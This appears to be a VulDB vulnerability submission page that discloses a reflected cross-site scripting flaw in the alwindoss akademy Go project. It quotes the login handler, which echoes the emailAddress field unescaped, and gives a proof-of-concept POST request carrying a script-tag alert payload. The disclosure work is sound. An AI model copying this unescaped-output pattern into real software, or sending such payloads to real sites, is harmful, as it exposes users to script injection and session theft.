提出 #397340: alwindoss akademy None Cross-site Scripting (XSS)情報

タイトル	alwindoss akademy None Cross-site Scripting (XSS)
説明	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in cmd/akademy/handler/handlers.go Flaw reason: in the CMD file/akademy/handler/handlers. Go line 40, output code directly provided by the user email address (obtained from the form values), without any form of filtering or escaped. This can result in Reflected XSS attacks. When a malicious user enters an email address containing a malicious script, the script will be executed on the user's browser, allowing the attacker to perform various malicious actions, such as stealing user information, manipulating user sessions, and more. Vulnerability POC: Suppose a malicious user enters an email address with a <script> tag, such as <script>alert('XSS'); </script>. When other users visit this page, their browsers execute this JavaScript code, and a warning box pops up saying "XSS", thus proving that there is a vulnerability. cmd/akademy/handler/handlers.go： ```Go // HandleLogin implements PageHandler. func (h pageHandler) HandleLogin(w http.ResponseWriter, r http.Request) { fmt.Println("Handle Login") r.ParseForm() email := r.FormValue("emailAddress") fmt.Println("Email", email) w.Write([]byte(email)) } ``` POC： ``` POST /login HTTP/1.1 Host: 192.168.1.7:8080 Content-Length: 148 Cache-Control: max-age=0 Origin: http://192.168.1.7:8080 DNT: 1 Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.7:8080/login Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,zh-TW;q=0.5 Cookie: csrf_token=4JyyOAwRuo9QF%2Bo71swuLmUwAEq15hh7AX/+Flas= Connection: keep-alive csrf_token=Iw9pXtxC5SGAwRuo9QF%2Bo71swuLmUwADk9tnAwRuo9QF%2Bo71swuLmUwAXbf0JbiLxPFkrjqc%2BA%3D%3D&emailAddress=<script>alert(1)</script> ``` ![image](https://github.com/user-attachments/assets/0b983660-1b03-4de4-b6df-94b35b7493da) ![image](https://github.com/user-attachments/assets/94f553fb-0320-4bc7-a4a3-6175a6e9a6e2)
ソース	⚠️ https://github.com/alwindoss/akademy/issues/1
ユーザー	zihe (UID 56943)
送信	2024年08月24日 10:42 (2 年 ago)
モデレーション	2024年09月04日 08:58 (11 days later)
ステータス	承諾済み
VulDBエントリ	276487 [alwindoss akademy 迄 35caccea888ed63d5489e211c99edff1f62efdba handlers.go emailAddress クロスサイトスクリプティング]
ポイント	20

◂ 前概要次 ▸

Want to stay up to date on a daily basis?

Enable the mail alert feature now!